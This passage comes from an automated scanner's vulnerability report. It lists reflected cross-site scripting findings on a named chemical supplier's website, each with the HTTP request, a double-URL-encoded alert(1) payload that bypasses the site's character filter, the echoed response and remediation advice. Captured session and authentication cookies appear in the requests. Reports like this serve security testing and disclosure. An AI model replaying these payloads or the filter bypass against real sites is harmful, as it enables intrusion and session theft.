Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcc5755";alert(1)//abe43477296/medialib/labware/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.394. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7004%2522%253balert%25281%2529%252f%252fa028f356556 was submitted in the REST URL parameter 2. This input was echoed as f7004";alert(1)//a028f356556 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf7004%2522%253balert%25281%2529%252f%252fa028f356556/labware/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf7004";alert(1)//a028f356556/labware/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.395. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f434%2522%253balert%25281%2529%252f%252f8691078ec1c was submitted in the REST URL parameter 3. This input was echoed as 5f434";alert(1)//8691078ec1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware5f434%2522%253balert%25281%2529%252f%252f8691078ec1c/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware5f434";alert(1)//8691078ec1c/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.396. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f6e%2522%253balert%25281%2529%252f%252f150685e59da was submitted in the REST URL parameter 4. This input was echoed as 70f6e";alert(1)//150685e59da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons70f6e%2522%253balert%25281%2529%252f%252f150685e59da/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:07 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons70f6e";alert(1)//150685e59da/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.397. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf92e%2522%253balert%25281%2529%252f%252f76c2d71983c was submitted in the REST URL parameter 5. This input was echoed as bf92e";alert(1)//76c2d71983c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/spectroscopybf92e%2522%253balert%25281%2529%252f%252f76c2d71983c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:09 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/spectroscopybf92e";alert(1)//76c2d71983c","E404") ;
   </script>
...[SNIP]...

1.398. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a2d2%2522%253balert%25281%2529%252f%252f7d7bae8e9ef was submitted in the REST URL parameter 1. This input was echoed as 8a2d2";alert(1)//7d7bae8e9ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8a2d2%2522%253balert%25281%2529%252f%252f7d7bae8e9ef/medialib/labware/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
